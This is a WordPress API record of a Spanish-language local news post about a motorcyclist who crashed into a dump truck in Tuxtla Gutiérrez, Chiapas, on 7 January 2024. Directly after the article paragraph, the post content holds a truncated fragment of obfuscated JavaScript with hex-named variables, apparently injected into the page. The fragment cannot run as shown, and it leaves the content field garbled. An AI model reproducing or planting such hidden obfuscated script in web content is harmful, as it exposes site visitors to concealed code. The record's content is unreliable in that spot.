{"id":13443,"date":"2024-01-08T00:31:53","date_gmt":"2024-01-08T00:31:53","guid":{"rendered":"https:\/\/reporteciudadanochiapas.com\/?p=13443"},"modified":"2024-01-08T00:31:54","modified_gmt":"2024-01-08T00:31:54","slug":"colisiona-motociclista-contra-volteo-en-teran","status":"publish","type":"post","link":"https:\/\/reporteciudadanochiapas.com\/?p=13443","title":{"rendered":"Colisiona Motociclista contra volteo en Ter\u00e1n"},"content":{"rendered":"\n<figure class=\"wp-block-image size-large\"><img loading=\"lazy\" decoding=\"async\" width=\"1024\" height=\"768\" src=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1704673841198-1024x768.jpg\" alt=\"\" class=\"wp-image-13444\" srcset=\"https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1704673841198-1024x768.jpg 1024w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1704673841198-300x225.jpg 300w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1704673841198-768x576.jpg 768w, https:\/\/reporteciudadanochiapas.com\/wp-content\/uploads\/2024\/01\/FB_IMG_1704673841198.jpg 1080w\" sizes=\"auto, (max-width: 1024px) 100vw, 1024px\" \/><\/figure>\n\n\n\n<p>Jairo Camacho.Agencia ReporteCiudano, 7 de enero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este domingo, un motociclista se estrell\u00f3 contra un cami\u00f3n tipo volteo cuando circulaba en la Colonia San Jos\u00e9 Ter\u00e1n de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando, el motociclista identificado como C\u00e9sar Emilio se estrell\u00f3 contra el volteo que le hizo corte de circulaci\u00f3n a la altura de la Tercera Poniente y 3a Norte.Por el golpe el motociclista y la Italika quedaron debajo de la pesada unidad.El lesionado fue auxiliado por los mismos colonos y personal de Protecci\u00f3n Civil se encarg\u00f3 de trasladarlo al hospital Gilberto G\u00f3mez Maza para su atenci\u00f3n m\u00e9dica especializada.Los elementos de tr\u00e1nsito municipal se hicieron cargo del siniestro y pusieron a disposici\u00f3n las dos unidades para deslindar responsabilidades.<\/p>\n\r\n(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return ","protected":false},"excerpt":{"rendered":"<p>Jairo Camacho.Agencia ReporteCiudano, 7 de enero del 2024. Tuxtla Guti\u00e9rrez. &#8211; Este domingo, un motociclista se estrell\u00f3 contra un cami\u00f3n tipo volteo cuando circulaba en la Colonia San Jos\u00e9 Ter\u00e1n de Tuxtla Guti\u00e9rrez.Los reportes oficiales informaron que, este hecho ocurri\u00f3 cuando, el motociclista identificado como C\u00e9sar Emilio se estrell\u00f3 contra el volteo que le hizo &hellip;<\/p>\n","protected":false},"author":2,"featured_media":13444,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[4],"tags":[],"class_list":["post-13443","post","type-post","status-publish","format-standard","has-post-thumbnail","","category-roja"],"_links":{"self":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13443","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=13443"}],"version-history":[{"count":1,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13443\/revisions"}],"predecessor-version":[{"id":13445,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/posts\/13443\/revisions\/13445"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=\/wp\/v2\/media\/13444"}],"wp:attachment":[{"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=13443"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=13443"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/reporteciudadanochiapas.com\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=13443"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}